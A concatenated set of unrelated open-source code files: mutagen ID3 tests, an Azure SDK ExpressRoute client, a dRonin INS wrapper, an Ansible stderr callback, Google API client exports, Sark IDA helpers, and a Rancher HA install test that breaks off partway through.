self.failIf("replaygain_foo_peak" in self.id3) self.failIf(self.id3._EasyID3__id3.getall("RVA2")) def test_peak_bad_value(self): self.failUnlessRaises( ValueError, self.id3.__setitem__, "replaygain_foo_peak", []) self.failUnlessRaises( ValueError, self.id3.__setitem__, "replaygain_foo_peak", ["foo"]) self.failUnlessRaises( ValueError, self.id3.__setitem__, "replaygain_foo_peak", ["1", "1"]) self.failUnlessRaises( ValueError, self.id3.__setitem__, "replaygain_foo_peak", ["3"]) self.failIf(self.id3._EasyID3__id3.getall("RVA2")) def test_gain_peak_get(self): 
self.id3["replaygain_foo_gain"] = "+3.5 dB" self.id3["replaygain_bar_peak"] = "0.5" self.failUnlessEqual( self.id3["replaygain_foo_gain"], ["+3.500000 dB"]) self.failUnlessEqual(self.id3["replaygain_foo_peak"], ["0.000000"]) self.failUnlessEqual( self.id3["replaygain_bar_gain"], ["+0.000000 dB"]) self.failUnlessEqual(self.id3["replaygain_bar_peak"], ["0.500000"]) def test_gain_peak_set(self): self.id3["replaygain_foo_gain"] = "+3.5 dB" self.id3["replaygain_bar_peak"] = "0.5" self.id3.save(self.filename) id3 = EasyID3(self.filename) self.failUnlessEqual(id3["replaygain_foo_gain"], ["+3.500000 dB"]) self.failUnlessEqual(id3["replaygain_foo_peak"], ["0.000000"]) self.failUnlessEqual(id3["replaygain_bar_gain"], ["+0.000000 dB"]) self.failUnlessEqual(id3["replaygain_bar_peak"], ["0.500000"]) def test_gain_peak_delete(self): self.id3["replaygain_foo_gain"] = "+3.5 dB" self.id3["replaygain_bar_peak"] = "0.5" del(self.id3["replaygain_bar_gain"]) del(self.id3["replaygain_foo_peak"]) self.failUnless("replaygain_foo_gain" in self.id3.keys()) self.failUnless("replaygain_bar_gain" in self.id3.keys()) del(self.id3["replaygain_foo_gain"]) del(self.id3["replaygain_bar_peak"]) self.failIf("replaygain_foo_gain" in self.id3.keys()) self.failIf("replaygain_bar_gain" in self.id3.keys()) del(self.id3["replaygain_foo_gain"]) del(self.id3["replaygain_bar_peak"]) self.failIf("replaygain_foo_gain" in self.id3.keys()) self.failIf("replaygain_bar_gain" in self.id3.keys()) def test_pickle(self): # http://code.google.com/p/mutagen/issues/detail?id=102 pickle.dumps(self.id3) def test_get_fallback(self): called = [] def get_func(id3, key): id3.getall("") self.failUnlessEqual(key, "nope") called.append(1) self.id3.GetFallback = get_func self.id3["nope"] self.failUnless(called) def test_set_fallback(self): called = [] def set_func(id3, key, value): id3.getall("") self.failUnlessEqual(key, "nope") self.failUnlessEqual(value, ["foo"]) called.append(1) self.id3.SetFallback = set_func self.id3["nope"] 
= "foo" self.failUnless(called) def test_del_fallback(self): called = [] def del_func(id3, key): id3.getall("") self.failUnlessEqual(key, "nope") called.append(1) self.id3.DeleteFallback = del_func del self.id3["nope"] self.failUnless(called) def test_list_fallback(self): def list_func(id3, key): id3.getall("") self.failIf(key) return ["somekey"] self.id3.ListFallback = list_func self.failUnlessEqual(self.id3.keys(), ["somekey"]) def tearDown(self): os.unlink(self.filename)
gpl-2.0
Azure/azure-sdk-for-python
sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_06_01/aio/operations/_peer_express_route_circuit_connections_operations.py
1
9352
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings

from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat

from ... import models as _models

T = TypeVar('T')
# Optional per-call callback: receives (pipeline_response, deserialized, response_headers)
# and its return value replaces the method's normal return value.
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]

class PeerExpressRouteCircuitConnectionsOperations:
    """PeerExpressRouteCircuitConnectionsOperations async operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.network.v2020_06_01.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    models = _models

    def __init__(self, client, config, serializer, deserializer) -> None:
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    async def get(
        self,
        resource_group_name: str,
        circuit_name: str,
        peering_name: str,
        connection_name: str,
        **kwargs
    ) -> "_models.PeerExpressRouteCircuitConnection":
        """Gets the specified Peer Express Route Circuit Connection from the specified express route
        circuit.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param circuit_name: The name of the express route circuit.
        :type circuit_name: str
        :param peering_name: The name of the peering.
        :type peering_name: str
        :param connection_name: The name of the peer express route circuit connection.
        :type connection_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: PeerExpressRouteCircuitConnection, or the result of cls(response)
        :rtype: ~azure.mgmt.network.v2020_06_01.models.PeerExpressRouteCircuitConnection
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PeerExpressRouteCircuitConnection"]
        # Map auth/404/409 status codes to specific exception types; callers may
        # extend or override the mapping via the 'error_map' kwarg.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-01"
        accept = "application/json"

        # Construct URL
        url = self.get.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'circuitName': self._serialize.url("circuit_name", circuit_name, 'str'),
            'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
            'connectionName': self._serialize.url("connection_name", connection_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # Only 200 is a success for this operation; anything else raises.
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('PeerExpressRouteCircuitConnection', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCircuits/{circuitName}/peerings/{peeringName}/peerConnections/{connectionName}'}  # type: ignore

    def list(
        self,
        resource_group_name: str,
        circuit_name: str,
        peering_name: str,
        **kwargs
    ) -> AsyncIterable["_models.PeerExpressRouteCircuitConnectionListResult"]:
        """Gets all global reach peer connections associated with a private peering in an express route
        circuit.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param circuit_name: The name of the circuit.
        :type circuit_name: str
        :param peering_name: The name of the peering.
        :type peering_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either PeerExpressRouteCircuitConnectionListResult or the result of cls(response)
        :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_06_01.models.PeerExpressRouteCircuitConnectionListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PeerExpressRouteCircuitConnectionListResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-01"
        accept = "application/json"

        def prepare_request(next_link=None):
            # Build either the first-page request (templated URL + api-version)
            # or a follow-up request to the server-supplied next_link.
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

            if not next_link:
                # Construct URL
                url = self.list.metadata['url']  # type: ignore
                path_format_arguments = {
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                    'circuitName': self._serialize.url("circuit_name", circuit_name, 'str'),
                    'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                # next_link already carries the query string; do not re-append api-version.
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request

        async def extract_data(pipeline_response):
            # Deserialize one page and return (continuation token, async iterable of items).
            deserialized = self._deserialize('PeerExpressRouteCircuitConnectionListResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)

        async def get_next(next_link=None):
            # Fetch one page; raises on any non-200 response.
            request = prepare_request(next_link)

            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response

        return AsyncItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCircuits/{circuitName}/peerings/{peeringName}/peerConnections'}  # type: ignore
mit
PTDreamer/dRonin
python/ins/cins.py
11
3838
from sympy import symbols, lambdify, sqrt
from sympy import MatrixSymbol, Matrix
from numpy import cos, sin, power
from sympy.matrices import *
from quaternions import *
import numpy
import ins

# this is the set of (currently) recommend INS settings. modified from
# https://raw.githubusercontent.com/wiki/TauLabs/TauLabs/files/htfpv-sparky-nav_20130527.uav
default_mag_var = numpy.array([10.0, 10.0, 100.0])
default_gyro_var = numpy.array([1e-5, 1e-5, 1e-4])
default_accel_var = numpy.array([0.01, 0.01, 0.01])
default_baro_var = 0.1
default_gps_var = numpy.array([1e-3, 1e-2, 10])


class CINS:
    """Thin Python wrapper around the C INS (insgps) extension module."""

    GRAV = 9.805  # gravitational acceleration [m/s^2]

    def __init__(self):
        """ Creates the CINS class.

         Important variables are
           * X  - the vector of state variables
           * Xd - the vector of state derivatives for state and inputs
           * Y  - the vector of outputs for current state value
        """
        self.state = []

    def configure(self, mag_var=None, gyro_var=None, accel_var=None, baro_var=None, gps_var=None):
        """ configure the INS parameters

        Each variance is forwarded to the C module only when provided, so
        callers can update a subset of the filter noise parameters.
        """
        if mag_var is not None:
            ins.configure(mag_var=mag_var)
        if gyro_var is not None:
            ins.configure(gyro_var=gyro_var)
        if accel_var is not None:
            ins.configure(accel_var=accel_var)
        if baro_var is not None:
            ins.configure(baro_var=baro_var)
        if gps_var is not None:
            ins.configure(gps_var=gps_var)

    def prepare(self):
        """ prepare the C INS wrapper

        Initializes the C module state and applies the recommended default
        sensor variances defined at module level.
        """
        self.state = ins.init()
        self.configure(
            mag_var=default_mag_var,
            gyro_var=default_gyro_var,
            accel_var=default_accel_var,
            baro_var=default_baro_var,
            gps_var=default_gps_var
        )

    def predict(self, gyros, accels, dT = 1.0/666.0):
        """ Perform the prediction step

        :param gyros: 3-element angular rate reading [rad/s]
        :param accels: 3-element accelerometer reading [m/s^2]
        :param dT: timestep [s]
        """
        self.state = ins.prediction(gyros, accels, dT)

    def correction(self, pos=None, vel=None, mag=None, baro=None):
        """ Perform the INS correction based on the provided corrections

        Only the measurements passed in (non-None) are applied; a bitmask is
        assembled accordingly and passed down to the C module.
        """
        sensors = 0
        Z = numpy.zeros((10,), numpy.float64)

        # the masks must match the values in insgps.h
        if pos is not None:
            sensors = sensors | 0x0003
            Z[0] = pos[0]
            Z[1] = pos[1]

        if vel is not None:
            sensors = sensors | 0x0038
            Z[3] = vel[0]
            Z[4] = vel[1]
            Z[5] = vel[2]

        if mag is not None:
            sensors = sensors | 0x01C0
            Z[6] = mag[0]
            Z[7] = mag[1]
            Z[8] = mag[2]

        if baro is not None:
            sensors = sensors | 0x0200
            Z[9] = baro

        self.state = ins.correction(Z, sensors)


def test():
    """ test the INS with simulated data """

    from numpy import cos, sin

    import matplotlib.pyplot as plt
    fig, ax = plt.subplots(2, 2)

    # BUGFIX: was `PyINS()`, a name that does not exist in this module.
    sim = CINS()
    sim.prepare()
    dT = 1.0 / 666.0

    STEPS = 100000
    history = numpy.zeros((STEPS, 16))
    history_rpy = numpy.zeros((STEPS, 3))
    times = numpy.zeros((STEPS, 1))

    for k in range(STEPS):
        ROLL = 0.1
        YAW = 0.2
        # BUGFIX: CINS.predict takes separate gyros/accels arguments, not a
        # stacked U vector as the (removed) sympy-based PyINS did.
        sim.predict(gyros=[0, 0, YAW],
                    accels=[0, CINS.GRAV * sin(ROLL), -CINS.GRAV * cos(ROLL)],
                    dT=dT)

        history[k, :] = sim.state
        history_rpy[k, :] = quat_rpy(sim.state[6:10])
        times[k] = k * dT

        angle = 0 * numpy.pi / 3 + YAW * dT * k  # radians
        height = 1.0 * k * dT

        if True and k % 60 == 59:
            sim.correction(pos=[[10], [5], [-height]])

        if True and k % 60 == 59:
            sim.correction(vel=[[0], [0], [-1]])

        if k % 20 == 8:
            sim.correction(baro=[height])

        if True and k % 20 == 15:
            sim.correction(mag=[[400 * cos(angle)], [-400 * sin(angle)], [1600]])

        if k % 1000 == 0:
            ax[0][0].cla()
            ax[0][0].plot(times[0:k:4], history[0:k:4, 0:3])
            ax[0][0].set_title('Position')
            ax[0][1].cla()
            ax[0][1].plot(times[0:k:4], history[0:k:4, 3:6])
            ax[0][1].set_title('Velocity')
            plt.sca(ax[0][1])
            plt.ylim(-2, 2)
            ax[1][0].cla()
            ax[1][0].plot(times[0:k:4], history_rpy[0:k:4, :])
            ax[1][0].set_title('Attitude')
            ax[1][1].cla()
            ax[1][1].plot(times[0:k:4], history[0:k:4, 10:])
            ax[1][1].set_title('Biases')

            plt.draw()
            fig.show()

    plt.show()


if __name__ == '__main__':
    test()
gpl-3.0
jnerin/ansible
lib/ansible/plugins/callback/stderr.py
59
3194
# (c) 2017, Frederic Van Espen <github@freh.be>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type

DOCUMENTATION = '''
    callback: stderr
    callback_type: stdout
    requirements:
      - set as main display callback
    short_description: Splits output, sending failed tasks to stderr
    version_added: "2.4"
    extends_documentation_fragment:
      - default_callback
    description:
        - This is the stderr callback plugin, it behaves like the default callback plugin but sends error output to stderr.
        - Also it does not output skipped host/task/item status
'''

from ansible import constants as C
from ansible.plugins.callback.default import CallbackModule as CallbackModule_default


class CallbackModule(CallbackModule_default):

    '''
    This is the stderr callback plugin, which reuses the default
    callback plugin but sends error output to stderr.
    '''

    CALLBACK_VERSION = 2.0
    CALLBACK_TYPE = 'stdout'
    CALLBACK_NAME = 'stderr'

    def __init__(self):
        # Keep a handle on the bound super object so subclass methods can
        # delegate to the default callback implementation.
        self.super_ref = super(CallbackModule, self)
        self.super_ref.__init__()

    def v2_runner_on_failed(self, result, ignore_errors=False):
        # Mirrors the default callback's failure handler, but passes
        # errors_to_stderr=True so the exception text goes to stderr, and
        # prints the fatal message itself with stderr=True.
        delegated_vars = result._result.get('_ansible_delegated_vars', None)
        self._clean_results(result._result, result._task.action)

        # With the 'free' strategy task banners are interleaved, so re-print
        # the banner if this result does not belong to the last-printed task.
        if self._play.strategy == 'free' and self._last_task_banner != result._task._uuid:
            self._print_task_banner(result._task)

        self._handle_exception(result._result, errors_to_stderr=True)
        self._handle_warnings(result._result)

        if result._task.loop and 'results' in result._result:
            # Loop tasks: report each item individually.
            self._process_items(result)

        else:
            if delegated_vars:
                self._display.display("fatal: [%s -> %s]: FAILED! => %s" % (result._host.get_name(), delegated_vars['ansible_host'],
                                                                            self._dump_results(result._result)), color=C.COLOR_ERROR,
                                      stderr=True)
            else:
                self._display.display("fatal: [%s]: FAILED! => %s" % (result._host.get_name(), self._dump_results(result._result)),
                                      color=C.COLOR_ERROR, stderr=True)

        if ignore_errors:
            self._display.display("...ignoring", color=C.COLOR_SKIP)

    def _handle_exception(self, result, errors_to_stderr=False):
        # Same as the default implementation except for the extra
        # errors_to_stderr flag, which routes the message to stderr.
        if 'exception' in result:
            msg = "An exception occurred during task execution. "
            if self._display.verbosity < 3:
                # extract just the actual error message from the exception text
                error = result['exception'].strip().split('\n')[-1]
                msg += "To see the full traceback, use -vvv. The error was: %s" % error
            else:
                msg = "The full traceback is:\n" + result['exception']
                del result['exception']

            self._display.display(msg, color=C.COLOR_ERROR, stderr=errors_to_stderr)
gpl-3.0
googleapis/googleapis-gen
google/cloud/aiplatform/v1beta1/aiplatform-v1beta1-py/google/cloud/aiplatform_v1beta1/services/vizier_service/transports/__init__.py
1
1185
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from typing import Dict, Type

from .base import VizierServiceTransport
from .grpc import VizierServiceGrpcTransport
from .grpc_asyncio import VizierServiceGrpcAsyncIOTransport

# Registry mapping transport names to their implementing classes.
_transport_registry = OrderedDict(
    [
        ('grpc', VizierServiceGrpcTransport),
        ('grpc_asyncio', VizierServiceGrpcAsyncIOTransport),
    ]
)  # type: Dict[str, Type[VizierServiceTransport]]

__all__ = (
    'VizierServiceTransport',
    'VizierServiceGrpcTransport',
    'VizierServiceGrpcAsyncIOTransport',
)
apache-2.0
googleapis/googleapis-gen
google/cloud/translate/v3beta1/translation-v3beta1-py/google/cloud/translate/__init__.py
1
5300
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

# Public re-exports for the google-cloud-translate v3beta1 surface.
from google.cloud.translate_v3beta1.services.translation_service.client import TranslationServiceClient
from google.cloud.translate_v3beta1.services.translation_service.async_client import TranslationServiceAsyncClient

from google.cloud.translate_v3beta1.types.translation_service import (
    BatchDocumentInputConfig,
    BatchDocumentOutputConfig,
    BatchTranslateDocumentMetadata,
    BatchTranslateDocumentRequest,
    BatchTranslateDocumentResponse,
    BatchTranslateMetadata,
    BatchTranslateResponse,
    BatchTranslateTextRequest,
    CreateGlossaryMetadata,
    CreateGlossaryRequest,
    DeleteGlossaryMetadata,
    DeleteGlossaryRequest,
    DeleteGlossaryResponse,
    DetectedLanguage,
    DetectLanguageRequest,
    DetectLanguageResponse,
    DocumentInputConfig,
    DocumentOutputConfig,
    DocumentTranslation,
    GcsDestination,
    GcsSource,
    GetGlossaryRequest,
    GetSupportedLanguagesRequest,
    Glossary,
    GlossaryInputConfig,
    InputConfig,
    ListGlossariesRequest,
    ListGlossariesResponse,
    OutputConfig,
    SupportedLanguage,
    SupportedLanguages,
    TranslateDocumentRequest,
    TranslateDocumentResponse,
    TranslateTextGlossaryConfig,
    TranslateTextRequest,
    TranslateTextResponse,
    Translation,
)

__all__ = ('TranslationServiceClient',
    'TranslationServiceAsyncClient',
    'BatchDocumentInputConfig',
    'BatchDocumentOutputConfig',
    'BatchTranslateDocumentMetadata',
    'BatchTranslateDocumentRequest',
    'BatchTranslateDocumentResponse',
    'BatchTranslateMetadata',
    'BatchTranslateResponse',
    'BatchTranslateTextRequest',
    'CreateGlossaryMetadata',
    'CreateGlossaryRequest',
    'DeleteGlossaryMetadata',
    'DeleteGlossaryRequest',
    'DeleteGlossaryResponse',
    'DetectedLanguage',
    'DetectLanguageRequest',
    'DetectLanguageResponse',
    'DocumentInputConfig',
    'DocumentOutputConfig',
    'DocumentTranslation',
    'GcsDestination',
    'GcsSource',
    'GetGlossaryRequest',
    'GetSupportedLanguagesRequest',
    'Glossary',
    'GlossaryInputConfig',
    'InputConfig',
    'ListGlossariesRequest',
    'ListGlossariesResponse',
    'OutputConfig',
    'SupportedLanguage',
    'SupportedLanguages',
    'TranslateDocumentRequest',
    'TranslateDocumentResponse',
    'TranslateTextGlossaryConfig',
    'TranslateTextRequest',
    'TranslateTextResponse',
    'Translation',
)
apache-2.0
OfficialMan/Sark
sark/core.py
3
4468
import idaapi
import idc
import string

from . import exceptions


def get_func(func_ea):
    """get_func(func_t or ea) -> func_t

    Take an IDA function (``idaapi.func_t``) or an address (EA) and return
    an IDA function object.

    Use this when APIs can take either a function or an address.

    Args:
        func_ea: ``idaapi.func_t`` or ea of the function.

    Returns:
        An ``idaapi.func_t`` object for the given address. If a ``func_t`` is
        provided, it is returned.
    """
    if isinstance(func_ea, idaapi.func_t):
        return func_ea
    func = idaapi.get_func(func_ea)
    if func is None:
        raise exceptions.SarkNoFunction("No function at 0x{:08X}".format(func_ea))

    return func


def get_ea(func_ea):
    """get_ea(func_t or ea) -> ea

    Same as `get_func`, but returns the EA.

    Args:
        func_ea: `idaapi.func_t` or EA.

    Returns:
        The ea.
    """
    if isinstance(func_ea, idaapi.func_t):
        return func_ea.startEA
    return func_ea


def is_string_printable(string_):
    """Check if a string is printable.

    BUGFIX: the previous implementation returned
    ``set(string_) - set(string.printable)`` -- the set of *non-printable*
    characters -- which is truthy exactly when the string is NOT printable,
    contradicting this function's name and inverting `string_to_query`'s
    choice between a quoted-ASCII and a hex-byte IDA search query.
    """
    return not (set(string_) - set(string.printable))


def string_to_query(string_):
    """Convert a string to an IDA binary-search query.

    Printable strings become a quoted ASCII query; anything else is encoded
    as space-separated hex bytes.
    """
    if is_string_printable(string_):
        return '"{}"'.format(string_)

    return " ".join(char.encode("hex") for char in string_)


def iter_find_string(query, start=None, end=None, down=True):
    """Iterate all occurrences of a string in [start, end)."""
    query = string_to_query(query)
    return iter_find_query(query, start, end, down)


def iter_find_query(query, start=None, end=None, down=True):
    """Iterate all matches of an IDA binary-search query in [start, end)."""
    start, end = fix_addresses(start, end)

    if down:
        direction = idc.SEARCH_DOWN
    else:
        direction = idc.SEARCH_UP
    current = idc.FindBinary(start, direction, query)
    while current < end:
        yield current
        current = idc.FindBinary(current + 1, direction, query)


def fix_addresses(start=None, end=None):
    """Set missing addresses to start and end of IDB.

    Take a start and end addresses. If an address is None or `BADADDR`,
    return start or end addresses of the IDB instead.

    Args
        start: Start EA. Use `None` to get IDB start.
        end:  End EA. Use `None` to get IDB end.

    Returns:
        (start, end)
    """
    if start in (None, idaapi.BADADDR):
        start = idaapi.cvar.inf.minEA

    if end in (None, idaapi.BADADDR):
        end = idaapi.cvar.inf.maxEA

    return start, end


def set_name(address, name, anyway=False):
    """Set the name of an address.

    Sets the name of an address in IDA.
    If the name already exists, check the `anyway` parameter:

        True - Add `_COUNTER` to the name (default IDA behaviour)
        False - Raise an `exceptions.SarkErrorNameAlreadyExists` exception.

    Args
        address: The address to rename.
        name: The desired name.
        anyway: Set anyway or not. Defualt ``False``.
    """
    success = idaapi.set_name(address, name, idaapi.SN_NOWARN | idaapi.SN_NOCHECK)
    if success:
        return

    if anyway:
        success = idaapi.do_name_anyway(address, name)
        if success:
            return

        raise exceptions.SarkSetNameFailed("Failed renaming 0x{:08X} to {!r}.".format(address, name))

    raise exceptions.SarkErrorNameAlreadyExists(
        "Can't rename 0x{:08X}. Name {!r} already exists.".format(address, name))


def is_same_function(ea1, ea2):
    """Are both addresses in the same function?"""
    func1 = idaapi.get_func(ea1)
    func2 = idaapi.get_func(ea2)
    # This is bloated code. `None in (func1, func2)` will not work because of
    # a bug in IDAPython in the way functions are compared.
    if any(func is None for func in (func1, func2)):
        return False

    return func1.startEA == func2.startEA


def get_name_or_address(ea):
    """Return the repr of the name at `ea`, or a hex address if unnamed."""
    name = idc.Name(ea)
    if name:
        name = repr(name)
    else:
        name = "0x{:08X}".format(ea)

    return name


def get_native_size():
    """Get the native word size in normal 8-bit bytes."""
    info = idaapi.get_inf_structure()
    if info.is_32bit():
        return 4
    elif info.is_64bit():
        return 8
    else:
        # 16-bit IDB.
        return 2


def get_fileregion_offset(ea):
    """Map an EA to its offset in the input file; raise if unmapped."""
    file_offset = idaapi.get_fileregion_offset(ea)
    if file_offset == -1:
        raise exceptions.NoFileOffset("Address 0x{:08X} is not mapped to any file offset.".format(ea))

    return file_offset


def is_function(ea):
    """Return True when `ea` falls inside a defined function."""
    try:
        get_func(ea)
        return True
    except exceptions.SarkNoFunction:
        return False
mit
rancher/rancher
tests/validation/tests/v3_api/test_create_ha.py
2
20647
from python_terraform import * # NOQA from .common import * # NOQA from .test_boto_create_eks import get_eks_kubeconfig from .test_import_k3s_cluster import create_multiple_control_cluster from .test_rke_cluster_provisioning import rke_config # RANCHER_HA_KUBECONFIG and RANCHER_HA_HOSTNAME are provided # when installing Rancher into a k3s setup RANCHER_HA_KUBECONFIG = os.environ.get("RANCHER_HA_KUBECONFIG") RANCHER_HA_HOSTNAME = os.environ.get( "RANCHER_HA_HOSTNAME", RANCHER_HOSTNAME_PREFIX + ".qa.rancher.space") resource_prefix = RANCHER_HA_HOSTNAME.split(".qa.rancher.space")[0] RANCHER_SERVER_URL = "https://" + RANCHER_HA_HOSTNAME RANCHER_CHART_VERSION = os.environ.get("RANCHER_CHART_VERSION") RANCHER_HELM_EXTRA_SETTINGS = os.environ.get("RANCHER_HELM_EXTRA_SETTINGS") RANCHER_IMAGE_TAG = os.environ.get("RANCHER_IMAGE_TAG") RANCHER_HELM_REPO = os.environ.get("RANCHER_HELM_REPO", "latest") RANCHER_LETSENCRYPT_EMAIL = os.environ.get("RANCHER_LETSENCRYPT_EMAIL") # Here is the list of cert types for HA install # [rancher-self-signed, byo-valid, byo-self-signed, letsencrypt] RANCHER_HA_CERT_OPTION = os.environ.get("RANCHER_HA_CERT_OPTION", "rancher-self-signed") RANCHER_VALID_TLS_CERT = os.environ.get("RANCHER_VALID_TLS_CERT") RANCHER_VALID_TLS_KEY = os.environ.get("RANCHER_VALID_TLS_KEY") RANCHER_BYO_TLS_CERT = os.environ.get("RANCHER_BYO_TLS_CERT") RANCHER_BYO_TLS_KEY = os.environ.get("RANCHER_BYO_TLS_KEY") RANCHER_PRIVATE_CA_CERT = os.environ.get("RANCHER_PRIVATE_CA_CERT") RANCHER_LOCAL_CLUSTER_TYPE = os.environ.get("RANCHER_LOCAL_CLUSTER_TYPE") RANCHER_ADD_CUSTOM_CLUSTER = os.environ.get("RANCHER_ADD_CUSTOM_CLUSTER", "True") KUBERNETES_VERSION = os.environ.get("RANCHER_LOCAL_KUBERNETES_VERSION","") RANCHER_K3S_VERSION = os.environ.get("RANCHER_K3S_VERSION", "") kubeconfig_path = DATA_SUBDIR + "/kube_config_cluster-ha-filled.yml" export_cmd = "export KUBECONFIG=" + kubeconfig_path def test_remove_rancher_ha(): assert CATTLE_TEST_URL.endswith(".qa.rancher.space"), \ 
"the CATTLE_TEST_URL need to end with .qa.rancher.space" if not check_if_ok(CATTLE_TEST_URL): print("skip deleting clusters within the setup") else: print("the CATTLE_TEST_URL is accessible") admin_token = get_user_token("admin", ADMIN_PASSWORD) client = get_client_for_token(admin_token) # delete clusters except the local cluster clusters = client.list_cluster(id_ne="local").data print("deleting the following clusters: {}" .format([cluster.name for cluster in clusters])) for cluster in clusters: print("deleting the following cluster : {}".format(cluster.name)) delete_cluster(client, cluster) resource_prefix = \ CATTLE_TEST_URL.split(".qa.rancher.space")[0].split("//")[1] delete_resource_in_AWS_by_prefix(resource_prefix) def test_install_rancher_ha(precheck_certificate_options): cm_install = True extra_settings = [] if "byo-" in RANCHER_HA_CERT_OPTION: cm_install = False print("The hostname is: {}".format(RANCHER_HA_HOSTNAME)) # prepare an RKE cluster and other resources # if no kubeconfig file is provided if RANCHER_HA_KUBECONFIG is None: if RANCHER_LOCAL_CLUSTER_TYPE == "RKE": print("RKE cluster is provisioning for the local cluster") nodes = create_resources() config_path = create_rke_cluster_config(nodes) create_rke_cluster(config_path) elif RANCHER_LOCAL_CLUSTER_TYPE == "K3S": print("K3S cluster is provisioning for the local cluster") k3s_kubeconfig_path = \ create_multiple_control_cluster() cmd = "cp {0} {1}".format(k3s_kubeconfig_path, kubeconfig_path) run_command_with_stderr(cmd) elif RANCHER_LOCAL_CLUSTER_TYPE == "EKS": create_resources_eks() eks_kubeconfig_path = get_eks_kubeconfig(resource_prefix + "-ekscluster") cmd = "cp {0} {1}".format(eks_kubeconfig_path, kubeconfig_path) 